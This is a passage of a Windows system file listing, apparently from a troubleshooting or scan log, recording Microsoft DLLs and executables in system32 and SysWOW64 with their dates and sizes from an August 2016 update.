2016-08-18 23:20 - 2016-08-03 01:46 - 03467776 _____ (Microsoft Corporation) C:\Windows\system32\WSService.dll
2016-08-18 23:20 - 2016-08-03 01:46 - 02463704 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-08-18 23:20 - 2016-08-03 01:46 - 01538168 _____ (Microsoft Corporation) C:\Windows\system32\sppobjs.dll
2016-08-18 23:20 - 2016-08-03 01:46 - 00552288 _____ (Microsoft Corporation) C:\Windows\system32\SettingSyncHost.exe
2016-08-18 23:20 - 2016-08-03 01:46 - 00051712 _____ (Microsoft Corporation) C:\Windows\system32\wldp.dll
2016-08-18 23:20 - 2016-08-03 01:38 - 06525424 _____ (Microsoft Corporation) C:\Windows\system32\sppsvc.exe
2016-08-18 23:20 - 2016-08-03 01:38 - 01134792 _____ (Microsoft Corporation) C:\Windows\system32\ClipUp.exe
2016-08-18 23:20 - 2016-08-03 01:38 - 00724168 _____ (Microsoft Corporation) C:\Windows\system32\SHCore.dll
2016-08-18 23:20 - 2016-08-03 01:38 - 00078040 _____ (Microsoft Corporation) C:\Windows\system32\Clipc.dll
2016-08-18 23:20 - 2016-08-03 01:37 - 00658568 _____ (Microsoft Corporation) C:\Windows\system32\ClipSVC.dll
2016-08-18 23:20 - 2016-08-03 01:33 - 00224704 _____ (Microsoft Corporation) C:\Windows\system32\policymanager.dll
2016-08-18 23:20 - 2016-08-03 00:57 - 00483328 _____ (Microsoft Corporation) C:\Windows\system32\OneDriveSettingSyncProvider.dll
2016-08-18 23:20 - 2016-08-03 00:54 - 11557888 _____ (Microsoft Corporation) C:\Windows\system32\twinui.dll
2016-08-18 23:20 - 2016-08-03 00:53 - 07569408 _____ (Microsoft Corporation) C:\Windows\system32\mos.dll
2016-08-18 23:20 - 2016-08-03 00:51 - 00446976 _____ (Microsoft Corporation) C:\Windows\system32\MapConfiguration.dll
2016-08-18 23:20 - 2016-08-03 00:49 - 06305792 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Search.dll
2016-08-18 23:20 - 2016-08-03 00:49 - 00371712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OneDriveSettingSyncProvider.dll
2016-08-18 23:20 - 2016-08-03 00:48 - 06788096 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-08-18 23:20 - 2016-08-03 00:46 - 01416704 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-08-18 23:20 - 2016-08-03 00:45 - 14241792 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2016-08-18 23:20 - 2016-08-03 00:45 - 12514304 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-08-18 23:20 - 2016-08-03 00:44 - 19337216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-08-18 23:20 - 2016-08-03 00:44 - 09889792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinui.dll
2016-08-18 23:20 - 2016-08-03 00:44 - 00893440 _____ (Microsoft Corporation) C:\Windows\system32\MbaeApiPublic.dll
2016-08-18 23:20 - 2016-08-03 00:42 - 00197632 _____ (Microsoft Corporation) C:\Windows\system32\NetSetupSvc.dll
2016-08-18 23:20 - 2016-08-03 00:41 - 04398592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Search.dll
2016-08-18 23:20 - 2016-08-03 00:40 - 05160960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-08-18 23:20 - 2016-08-03 00:40 - 00420352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GamePanel.exe
2016-08-18 23:20 - 2016-08-03 00:39 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2016-08-18 23:20 - 2016-08-03 00:38 - 06101504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mos.dll
2016-08-18 23:20 - 2016-08-03 00:36 - 07502848 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2016-08-18 23:20 - 2016-08-03 00:36 - 00671232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MbaeApiPublic.dll
2016-08-18 23:20 - 2016-08-03 00:36 - 00171520 _____ (Microsoft Corporation) C:\Windows\system32\WPTaskScheduler.dll
2016-08-18 23:20 - 2016-08-03 00:34 - 00740864 _____ (Microsoft Corporation) C:\Windows\system32\AzureSettingSyncProvider.dll
2016-08-18 23:20 - 2016-08-03 00:33 - 12589056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2016-08-18 23:20 - 2016-08-03 00:27 - 11270656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-08-18 23:20 - 2016-08-03 00:26 - 06713856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2016-08-18 23:20 - 2016-06-23 23:56 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\updatehandlers.dll
2016-08-18 23:20 - 2016-06-23 23:53 - 00354816 _____ (Microsoft Corporation) C:\Windows\system32\usocore.dll
2016-08-18 23:20 - 2016-06-23 23:45 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-08-18 23:20 - 2016-06-23 23:44 - 05510656 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2016-08-18 23:20 - 2016-06-23 23:43 - 00841728 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-08-18 23:20 - 2016-06-23 23:42 - 00166400 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-08-18 23:20 - 2016-06-23 23:22 - 04737536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1.dll
2016-08-18 23:20 - 2016-06-23 23:15 - 00252928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-08-18 23:20 - 2016-05-28 01:02 - 06488312 _____ (Microsoft Corporation) C:\Windows\system32\windows.storage.dll
2016-08-18 23:20 - 2016-05-28 00:52 - 22326760 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll
2016-08-18 23:20 - 2016-05-28 00:38 - 05118024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\windows.storage.dll
2016-08-18 23:20 - 2016-05-28 00:27 - 20861984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll
2016-08-18 23:20 - 2016-05-28 00:10 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\browserbroker.dll
2016-08-18 23:20 - 2016-05-27 23:54 - 00392192 _____ (Microsoft Corporation) C:\Windows\system32\IPSECSVC.DLL
2016-08-18 23:20 - 2016-05-27 23:52 - 02663424 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
2016-08-18 23:20 - 2016-05-27 23:40 - 00672768 _____ (Microsoft Corporation) C:\Windows\system32\ieproxy.dll
2016-08-18 23:20 - 2016-05-27 23:38 - 01821696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Logon.dll
2016-08-18 23:20 - 2016-04-15 03:21 - 01085776 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2016-08-18 23:20 - 2016-04-15 02:43 - 00916800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2016-08-18 23:20 - 2016-04-15 02:06 - 00602624 _____ (Microsoft Corporation) C:\Windows\system32\LogonController.dll
2016-08-18 23:20 - 2016-04-15 01:42 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LogonController.dll
2016-08-18 23:20 - 2016-04-09 03:54 - 00768000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2016-08-18 23:20 - 2016-04-09 03:52 - 00206336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\pku2u.dll
2016-08-18 23:20 - 2016-04-09 03:38 - 00464384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
2016-08-18 23:20 - 2016-04-09 02:42 - 00950272 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2016-08-18 23:20 - 2016-04-09 02:41 - 00253952 _____ (Microsoft Corporation) C:\Windows\system32\pku2u.dll
2016-08-18 23:20 - 2016-04-09 02:27 - 00627712 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
2016-08-18 23:20 - 2016-03-16 00:54 - 00595016 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Shell.Broker.dll
2016-08-18 23:20 - 2016-03-16 00:45 - 00140536 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-08-18 23:20 - 2016-03-16 00:08 - 00151552 _____ (Microsoft Corporation) C:\Windows\system32\MusNotification.exe
2016-08-18 23:20 - 2016-03-15 23:56 - 00194048 _____ (Microsoft Corporation) C:\Windows\system32\SharedStartModelShim.dll
2016-08-18 23:20 - 2016-03-15 23:51 - 00334848 _____ (Microsoft Corporation) C:\Windows\system32\MusUpdateHandlers.dll
2016-08-18 23:20 - 2016-03-15 23:49 - 00850432 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2016-08-18 23:20 - 2016-03-15 23:46 - 00196096 _____ (Microsoft Corporation) C:\Windows\system32\fwpolicyiomgr.dll
2016-08-18 23:20 - 2016-03-15 23:40 - 00324096 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2016-08-18 23:20 - 2016-03-15 23:40 - 00322048 _____ (Microsoft Corporation) C:\Windows\system32\vaultsvc.dll
2016-08-18 23:20 - 2016-03-15 23:40 - 00135168 _____ (Microsoft Corporation) C:\Windows\system32\AuthBroker.dll
2016-08-18 23:20 - 2016-03-15 23:40 - 00095232 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2016-08-18 23:20 - 2016-03-15 23:39 - 00414208 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2016-08-18 23:20 - 2016-03-15 23:37 - 00685568 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentApis.dll
2016-08-18 23:20 - 2016-03-15 23:36 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\ExSMime.dll
2016-08-18 23:20 - 2016-03-15 23:36 - 00255488 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2016-08-18 23:20 - 2016-03-15 23:35 - 00246272 _____ (Microsoft Corporation) C:\Windows\system32\PackageStateRoaming.dll
2016-08-18 23:20 - 2016-03-15 23:35 - 00185344 _____ (Microsoft Corporation) C:\Windows\system32\psmsrv.dll
2016-08-18 23:20 - 2016-03-15 23:24 - 00163840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwpolicyiomgr.dll
2016-08-18 23:20 - 2016-03-15 23:18 - 00104960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AuthBroker.dll
2016-08-18 23:20 - 2016-03-15 23:17 - 00060928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2016-08-18 23:20 - 2016-03-15 23:16 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2016-08-18 23:20 - 2016-03-15 23:13 - 00223744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExSMime.dll
2016-08-18 23:20 - 2016-03-15 23:13 - 00202240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2016-08-18 23:20 - 2016-03-15 23:12 - 00195584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PackageStateRoaming.dll
2016-08-18 23:20 - 2016-02-23 10:50 - 00630160 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2016-08-18 23:20 - 2016-02-23 10:41 - 00299600 _____ (Microsoft Corporation) C:\Windows\system32\WMASF.DLL
2016-08-18 23:20 - 2016-02-23 10:11 - 00781984 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2016-08-18 23:20 - 2016-02-23 09:11 - 00249976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMASF.DLL
2016-08-18 23:20 - 2016-02-23 08:42 - 00658536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2016-08-18 23:20 - 2016-02-23 07:42 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-08-18 23:20 - 2016-02-23 07:18 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2016-08-18 23:20 - 2016-02-23 06:45 - 00078848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-08-18 23:20 - 2016-01-31 02:25 - 01248896 _____ (Microsoft Corporation) C:\Windows\system32\WinTypes.dll
2016-08-18 23:20 - 2016-01-31 02:06 - 00809336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WinTypes.dll
2016-08-18 23:20 - 2016-01-31 01:26 - 03793408 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2016-08-18 23:20 - 2016-01-31 01:19 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\NetworkDesktopSettings.dll
2016-08-18 23:20 - 2016-01-31 01:17 - 00109056 _____ (Microsoft Corporation) C:\Windows\system32\hlink.dll
2016-08-18 23:20 - 2016-01-31 01:04 - 00100352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hlink.dll
2016-08-18 23:20 - 2016-01-04 23:04 - 00784136 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-08-18 23:20 - 2016-01-04 23:04 - 00779928 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-08-18 23:20 - 2016-01-04 23:04 - 00233992 _____ (Microsoft Corporation) C:\Windows\system32\mftranscode.dll
2016-08-18 23:20 - 2016-01-04 23:04 - 00090912 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-08-18 23:20 - 2016-01-04 22:29 - 00208688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mftranscode.dll
2016-08-18 23:20 - 2016-01-04 22:28 - 00645144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-08-18 23:20 - 2016-01-04 22:28 - 00635312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-08-18 23:20 - 2016-01-04 22:28 - 00082096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-08-18 23:20 - 2016-01-04 22:15 - 00235008 _____ (Microsoft Corporation) C:\Windows\system32\UserMgrProxy.dll
2016-08-18 23:20 - 2016-01-04 22:15 - 00042496 _____ (Microsoft Corporation) C:\Windows\system32\usermgrcli.dll
2016-08-18 23:20 - 2016-01-04 22:02 - 01672192 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-08-18 23:20 - 2016-01-04 22:02 - 00678912 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-08-18 23:20 - 2016-01-04 22:02 - 00379392 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-08-18 23:20 - 2016-01-04 22:01 - 00305664 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-08-18 23:20 - 2016-01-04 21:57 - 00712704 _____ (Microsoft Corporation) C:\Windows\system32\usermgr.dll
2016-08-18 23:20 - 2016-01-04 21:57 - 00578560 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2016-08-18 23:20 - 2016-01-04 21:44 - 00159744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserMgrProxy.dll
2016-08-18 23:20 - 2016-01-04 21:44 - 00033280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usermgrcli.dll
2016-08-18 23:20 - 2016-01-04 21:32 - 01541632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-08-18 23:20 - 2016-01-04 21:32 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-08-18 23:20 - 2016-01-04 21:31 - 00563200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-08-18 23:20 - 2016-01-04 21:31 - 00235008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-08-18 23:20 - 2015-11-25 01:42 - 00168288 _____ (Microsoft Corporation) C:\Windows\system32\NetworkUXBroker.exe
2016-08-18 23:20 - 2015-11-25 00:49 - 00498688 _____ (Microsoft Corporation) C:\Windows\system32\WlanMediaManager.dll
2016-08-18 23:20 - 2015-11-25 00:49 - 00467456 _____ (Microsoft Corporation) C:\Windows\system32\MBMediaManager.dll
2016-08-18 23:20 - 2015-11-25 00:49 - 00270336 _____ (Microsoft Corporation) C:\Windows\system32\RasMediaManager.dll
2016-08-18 23:20 - 2015-11-25 00:48 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\EthernetMediaManager.dll
2016-08-18 23:20 - 2015-11-25 00:48 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\DAMediaManager.dll
2016-08-18 23:20 - 2015-11-25 00:28 - 00523776 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2016-08-18 23:20 - 2015-11-25 00:25 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\profext.dll
2016-08-18 23:20 - 2015-11-25 00:10 - 00415744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2016-08-18 23:20 - 2015-11-25 00:07 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\profext.dll
2016-08-18 23:20 - 2015-11-05 01:15 - 00541024 _____ (Microsoft Corporation) C:\Windows\system32\mcupdate_GenuineIntel.dll
2016-08-18 23:20 - 2015-11-05 01:11 - 01392480 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManager.dll
2016-08-18 23:20 - 2015-11-05 01:06 - 00966416 _____ (Microsoft Corporation) C:\Windows\system32\twinapi.appcore.dll
2016-08-18 23:20 - 2015-11-05 00:30 - 00961376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LicenseManager.dll
2016-08-18 23:20 - 2015-11-05 00:23 - 00762888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\twinapi.appcore.dll
2016-08-18 23:20 - 2015-11-05 00:18 - 03248128 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
2016-08-18 23:20 - 2015-11-04 23:42 - 02647040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
2016-08-18 23:20 - 2015-09-30 23:03 - 00757760 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2016-08-18 23:20 - 2015-09-24 23:03 - 00796160 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2016-08-18 23:20 - 2015-09-24 22:37 - 00613376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2016-08-18 23:20 - 2015-09-17 02:49 - 00894256 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2016-08-18 23:20 - 2015-09-17 02:48 - 00584656 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2016-08-18 23:20 - 2015-09-17 02:48 - 00555768 _____ (Microsoft Corporation) C:\Windows\system32\directmanipulation.dll
2016-08-18 23:20 - 2015-09-17 02:48 - 00476760 _____ (Microsoft Corporation) C:\Windows\system32\MFCaptureEngine.dll
2016-08-18 23:20 - 2015-09-17 02:28 - 00074880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\remoteaudioendpoint.dll
2016-08-18 23:20 - 2015-09-17 02:27 - 00454512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\directmanipulation.dll
2016-08-18 23:20 - 2015-09-17 02:26 - 00434376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFCaptureEngine.dll
2016-08-18 23:20 - 2015-09-17 02:08 - 00026624 _____ (Microsoft Corporation) C:\Windows\system32\LicenseManagerShellext.exe
2016-08-18 23:20 - 2015-09-17 02:05 - 02226688 _____ (Microsoft Corporation) C:\Windows\system32\NetworkMobileSettings.dll
2016-08-18 23:20 - 2015-09-17 02:04 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\DataSenseHandlers.dll
2016-08-18 23:20 - 2015-09-17 01:58 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\tileobjserver.dll
2016-08-18 23:20 - 2015-09-17 01:57 - 02228736 _____ (Microsoft Corporation) C:\Windows\system32\wlansvc.dll
2016-08-18 23:20 - 2015-09-17 01:57 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\VEEventDispatcher.dll
2016-08-18 23:20 - 2015-09-17 01:56 - 00859136 _____ (Microsoft Corporation) C:\Windows\system32\modernexecserver.dll
2016-08-18 23:20 - 2015-09-17 01:55 - 00671232 _____ (Microsoft Corporation) C:\Windows\system32\WUDFx02000.dll
2016-08-18 23:20 - 2015-09-17 01:54 - 03781120 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_nt.dll
2016-08-18 23:20 - 2015-09-17 01:52 - 00591360 _____ (Microsoft Corporation) C:\Windows\system32\wcmsvc.dll
2016-08-18 23:20 - 2015-09-17 01:52 - 00465920 _____ (Microsoft Corporation) C:\Windows\system32\wwanconn.dll
2016-08-18 23:20 - 2015-09-17 01:52 - 00204800 _____ (Microsoft Corporation) C:\Windows\system32\wcmcsp.dll
2016-08-18 23:20 - 2015-09-17 01:52 - 00162304 _____ (Microsoft Corporation) C:\Windows\system32\SubscriptionMgr.dll
2016-08-18 23:20 - 2015-09-17 01:51 - 00359936 _____ (Microsoft Corporation) C:\Windows\system32\ncsi.dll
2016-08-18 23:20 - 2015-09-17 01:50 - 00312832 _____ (Microsoft Corporation) C:\Windows\system32\SensorsApi.dll
2016-08-18 23:20 - 2015-09-17 01:49 - 00342016 _____ (Microsoft Corporation) C:\Windows\system32\LocationGeofences.dll
2016-08-18 23:20 - 2015-09-17 01:49 - 00268800 _____ (Microsoft Corporation) C:\Windows\system32\LocationFramework.dll
2016-08-18 23:20 - 2015-09-17 01:48 - 00517632 _____ (Microsoft Corporation) C:\Windows\system32\NotificationController.dll
2016-08-18 23:20 - 2015-09-17 01:48 - 00408064 _____ (Microsoft Corporation) C:\Windows\system32\CredProvDataModel.dll
2016-08-18 23:20 - 2015-09-17 01:48 - 00387584 _____ (Microsoft Corporation) C:\Windows\system32\LockAppBroker.dll
2016-08-18 23:20 - 2015-09-17 01:47 - 00186880 _____ (Microsoft Corporation) C:\Windows\system32\cloudAP.dll
2016-08-18 23:20 - 2015-09-17 01:45 - 00869376 _____ (Microsoft Corporation) C:\Windows\system32\MapControlCore.dll
2016-08-18 23:20 - 2015-09-17 01:41 - 00217088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VEEventDispatcher.dll
2016-08-18 23:20 - 2015-09-17 01:34 - 00253440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SensorsApi.dll
2016-08-18 23:20 - 2015-09-17 01:32 - 00336384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CredProvDataModel.dll
2016-08-18 23:20 - 2015-09-17 01:29 - 00701952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JpMapControl.dll
2016-08-18 23:20 - 2015-09-17 01:29 - 00677888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapControlCore.dll
2016-08-18 23:20 - 2015-08-27 01:42 - 00596480 _____ (Microsoft Corporation) C:\Windows\system32\SettingSync.dll
2016-08-18 23:20 - 2015-08-27 01:42 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\shacct.dll
2016-08-18 23:20 - 2015-08-27 01:11 - 00484352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SettingSync.dll
2016-08-18 23:20 - 2015-08-27 01:11 - 00139776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shacct.dll
2016-08-18 23:20 - 2015-08-18 02:57 - 00045568 _____ (Microsoft Corporation) C:\Windows\system32\wfdprov.dll
2016-08-18 23:20 - 2015-08-11 06:02 - 00292856 _____ (Microsoft Corporation) C:\Windows\system32\LockAppHost.exe
2016-08-18 23:20 - 2015-08-11 05:37 - 00243800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\LockAppHost.exe
2016-08-18 23:20 - 2015-08-11 05:19 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Notifications.dll
2016-08-18 23:20 - 2015-08-11 05:05 - 00137216 _____ (Microsoft Corporation) C:\Windows\system32\LocationPermissions.dll
2016-08-18 23:20 - 2015-08-03 23:23 - 00078848 _____ (Microsoft Corporation) C:\Windows\system32\VPNv2CSP.dll
2016-08-18 23:20 - 2015-08-02 22:18 - 08613200 _____ (Microsoft Corp.) C:\Windows\system32\Windows.Media.Protection.PlayReady.dll
2016-08-18 23:20 - 2015-08-02 21:56 - 06878256 _____ (Microsoft Corp.) C:\Windows\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-08-18 23:20 - 2015-07-30 00:08 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\MusNotificationUx.exe
2016-08-18 23:20 - 2015-07-29 23:29 - 00654848 _____ (Microsoft Corporation) C:\Windows\system32\PlayToManager.dll
2016-08-18 23:20 - 2015-07-29 22:58 - 00497152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PlayToManager.dll
2016-08-18 23:20 - 2015-07-25 23:40 - 00542720 _____ (Microsoft Corporation) C:\Windows\system32\SearchFolder.dll
2016-08-18 23:20 - 2015-07-25 23:30 - 00452608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchFolder.dll
2016-08-18 23:20 - 2015-07-23 22:55 - 00503296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Connectivity.dll
2016-08-18 23:20 - 2015-07-23 22:52 - 00680448 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Connectivity.dll
2016-08-18 23:20 - 2015-07-23 22:44 - 00167424 _____ (Microsoft Corporation) C:\Windows\system32\SettingsHandlers_Privacy.dll
2016-08-18 23:20 - 2015-07-22 00:02 - 00589824 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll
2016-08-18 23:20 - 2015-07-21 23:07 - 00458752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\uxtheme.dll
2016-08-18 23:20 - 2015-07-16 22:26 - 00584704 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Sensors.dll
2016-08-18 23:20 - 2015-07-16 22:24 - 00752640 _____ (Microsoft Corporation) C:\Windows\system32\efscore.dll
2016-08-18 23:20 - 2015-07-16 21:53 - 00437248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Sensors.dll
2016-08-18 23:20 - 2015-07-16 21:50 - 00589312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\efscore.dll
2016-08-18 23:20 - 2015-07-16 00:04 - 01201664 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Cred.dll
2016-08-18 23:20 - 2015-07-15 23:47 - 00754688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Cred.dll
2016-08-18 23:20 - 2015-07-15 23:36 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\ConhostV2.dll
2016-08-18 23:20 - 2015-07-14 22:04 - 00032768 _____ C:\Windows\system32\LicenseManagerApi.dll
2016-08-18 23:20 - 2015-07-14 21:35 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\unenrollhook.dll
2016-08-18 23:20 - 2015-07-14 21:27 - 00056320 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Cortana.PAL.Desktop.dll
2016-08-18 23:20 - 2015-07-11 20:25 - 01031680 _____ (Microsoft Corporation) C:\Windows\system32\SensorDataService.exe
2016-08-18 23:20 - 2015-07-11 20:18 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\AppContracts.dll
2016-08-18 23:20 - 2015-07-11 19:46 - 00441344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppContracts.dll
2016-08-18 23:20 - 2015-07-10 21:28 - 00414720 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.BioFeedback.dll
2016-08-18 23:20 - 2015-07-10 21:07 - 00485888 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.BlockedShutdown.dll
2016-08-18 23:20 - 2015-07-10 21:02 - 00283648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.BioFeedback.dll
2016-08-18 23:20 - 2015-07-10 20:43 - 00322048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.BlockedShutdown.dll
2016-08-18 23:20 - 2015-07-10 05:53 - 01169408 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2016-08-18 23:19 - 2016-08-03 02:25 - 00953472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2016-08-18 23:19 - 2016-08-03 02:24 - 01767008 _____ C:\Windows\SysWOW64\CoreUIComponents.dll
2016-08-18 23:19 - 2016-08-03 02:24 - 01531368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-08-18 23:19 - 2016-08-03 02:23 - 01895576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\hevcdecoder.dll
2016-08-18 23:19 - 2016-08-03 02:22 - 01811360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2016-08-18 23:19 - 2016-08-03 02:15 - 02881624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-08-18 23:19 - 2016-08-03 01:46 - 02816016 _____ (Microsoft Corporation) C:\Windows\system32\WpcMon.exe
2016-08-18 23:19 - 2016-08-03 01:46 - 01951864 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-08-18 23:19 - 2016-08-03 01:46 - 01563480 _____ (Microsoft Corporation) C:\Windows\system32\wmpmde.dll
2016-08-18 23:19 - 2016-08-03 01:46 - 01561360 _____ (Microsoft Corporation) C:\Windows\system32\winmde.dll
